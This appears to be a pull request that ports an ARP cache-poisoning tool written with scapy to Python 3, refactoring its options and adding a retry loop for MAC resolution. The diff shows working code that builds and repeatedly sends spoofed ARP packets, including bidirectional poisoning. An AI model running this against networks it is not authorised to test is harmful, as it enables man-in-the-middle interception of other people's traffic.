### PR TITLE
Python3 compatible

### DIFF
--- a/arpspoof/arpspoof.py
+++ b/arpspoof/arpspoof.py
@@ -18,7 +18,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # Gets rid of IPV6 E
 
 def main():
     if os.geteuid() != 0:
-        print "[-] Run me as root"
+        print("[-] Run me as root")
         sys.exit(1)
 
     usage = 'Usage: %prog [-i interface] [-t target] host'
@@ -43,7 +43,7 @@ def main():
         elif options.target:
             target_mac = getmacbyip(target)
             if target_mac is None:
-                print "[-] Error: Could not resolve targets MAC address"
+                print("[-] Error: Could not resolve targets MAC address")
                 sys.exit(1)
             pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target)
 
@@ -55,7 +55,7 @@ def main():
         elif target:
             target_mac = getmacbyip(target)
             if target_mac is None:
-                print "[-] Error: Could not resolve targets MAC address"
+                print("[-] Error: Could not resolve targets MAC address")
                 sys.exit(1)
             pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target, op=2)
 
@@ -63,7 +63,7 @@ def main():
 
     def rearp(signal, frame):
         sleep(1)
-        print '\n[*] Re-arping network'
+        print('\n[*] Re-arping network')
         rearp_mac = getmacbyip(host)
         pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=host, hwsrc=mac, op=2)
         sendp(pkt, inter=1, count=5, iface=options.interface)
@@ -99,3 +99,6 @@ def main():
         sendp(pkt, inter=2, iface=options.interface)
         if options.reverse:
             sendp(r_pkt, inter=2, iface=options.interface)
+
+if __name__ == "__main__":
+    main()

--- a/arpspoof/arpspoof.py
+++ b/arpspoof/arpspoof.py
@@ -13,7 +13,49 @@ from scapy.all import (
 from optparse import OptionParser
 from time import sleep
 
+
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # Gets rid of IPV6 Error when importing scapy
+
+
+def init_args():
+    parser = OptionParser('Usage: %prog [-i interface] [-t target] host')
+
+    parser.add_option(
+        '-i',
+        dest='interface',
+        help='Specify the interface to use')
+    parser.add_option(
+        '-t',
+        dest='target',
+        help='Specify a particular host to ARP poison')
+    parser.add_option(
+        '-r',
+        action='store_true',
+        dest='reverse',
+        help='Poison both target and host (bidirectional spoofing). Only valid in conjunction with -t.')
+    parser.add_option(
+        '-m',
+        dest='mode',
+        default='req',
+        help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
+    parser.add_option(
+        '-s',
+        action='store_true',
+        dest='summary',
+        default=False,
+        help='Show packet summary and ask for confirmation before poisoning. Need to run with -r')
+
+    opts, arg = parser.parse_args()
+
+    if len(arg) != 1 or opts.interface is None:
+        parser.print_help()
+        sys.exit(0)
+
+    if opts.summary and not opts.reverse:
+        parser.print_help()
+        sys.exit(0)
+
+    return opts, arg
 
 
 def main():
@@ -21,19 +63,7 @@ def main():
         print("[-] Run me as root")
         sys.exit(1)
 
-    usage = 'Usage: %prog [-i interface] [-t target] host'
-    parser = OptionParser(usage)
-    parser.add_option('-i', dest='interface', help='Specify the interface to use')
-    parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')
-    parser.add_option('-r', action='store_true', dest='reverse', help='Poison both target and host (bidirectional spoofing). Only valid in conjunction with -t.')
-    parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
-    parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
-    (options, args) = parser.parse_args()
-
-    if len(args) != 1 or options.interface is None:
-        parser.print_help()
-        sys.exit(0)
-
+    options, args = init_args()
     host = args[0]
     mac = get_if_hwaddr(options.interface)
 
@@ -41,10 +71,10 @@ def main():
         if target is None:
             pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, pdst=host)
         elif options.target:
-            target_mac = getmacbyip(target)
-            if target_mac is None:
-                print("[-] Error: Could not resolve targets MAC address")
-                sys.exit(1)
+            print("[-] Obtaining mac from {}".format(target))
+            target_mac = None
+            while not target_mac:
+                target_mac = getmacbyip(target)
             pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target)
 
         return pkt
@@ -53,10 +83,10 @@ def main():
         if target is None:
             pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=host, op=2)
         elif target:
-            target_mac = getmacbyip(target)
-            if target_mac is None:
-                print("[-] Error: Could not resolve targets MAC address")
-                sys.exit(1)
+            print("[-] Obtaining mac from {}".format(target))
+            target_mac = None
+            while not target_mac:
+                target_mac = getmacbyip(target)
             pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target, op=2)
 
         return pkt
@@ -89,7 +119,7 @@ def main():
     if options.summary:
         pkt.show()
         r_pkt.show()
-        ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
+        ans = input('\n[*] Continue? [Y|n]: ').lower()
         if ans == 'y' or len(ans) == 0:
             pass
         else:
@@ -99,6 +129,7 @@ def main():
         sendp(pkt, inter=2, iface=options.interface)
         if options.reverse:
             sendp(r_pkt, inter=2, iface=options.interface)
+
 
 if __name__ == "__main__":
     main()

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,1 +1,2 @@
 wheel==0.23.0
+scapy


### PR DESCRIPTION
I was about to do something similar to this in a project of mine, when I saw this repo. I figured I could try making this Python3 compatible and perhaps learn something along the way trying to get it working. 

Replaced print statements with functions, functioned out the arg initialization and checks, added a check so that summary couldn't be declared without reverse being declared (since r_pck is only defined when reverse is), made arpspoof callable and added a loop around scapy's getmacbyip since every few runs without this change I'd get an error that the mac couldn't be resolved.

In the end I didn't refactor it that much (I had wanted to take those other functions defined in main out, but in doing so learned why they were there in the first place).

Not sure if this is maintained or if this is wanted or anything, but I learned at least a little through this endeavor, which should help with my other project, so I figured I could at least PR this.